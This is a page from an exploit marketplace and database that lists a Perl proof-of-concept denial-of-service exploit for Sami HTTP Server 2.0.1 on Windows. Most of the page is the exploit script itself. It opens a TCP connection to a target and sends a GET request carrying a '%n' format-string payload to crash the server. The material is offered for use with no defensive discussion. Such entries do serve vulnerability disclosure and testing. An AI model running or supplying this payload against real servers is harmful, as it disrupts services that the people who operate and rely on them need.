[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit

Author
wingthor
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14742
Category
dos / poc
Date add
06-11-2010
Platform
windows
============================================================
Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
============================================================

#!/usr/bin/perl
# Exploit Titel: Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
# Date: 25.10.10
# Tool: Sami HTTP Server -- Version: 2.0.1
# Vendor-Website: http://www.karjasoft.com/old.php
# Download Link: http://www.karjasoft.com/files/samihttp/samihttpd_install.exe
# Author: wingthor
# Author-Website (German): http://www.wingthor.de
# Author-Email: exploit@wingthor.de
# Tested on: Windows XP SP3
# Type: DOS/POC
 
 
use IO::Socket;
 
$target = "127.0.0.1";
$port   = 80;
 
$payload = "GET /%n%n%n%n%n HTTP/1.1\r\n\r\n";
 
$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n";
 
$sock->send($payload);
 
close($sock);



#  0day.today [2024-12-25]  #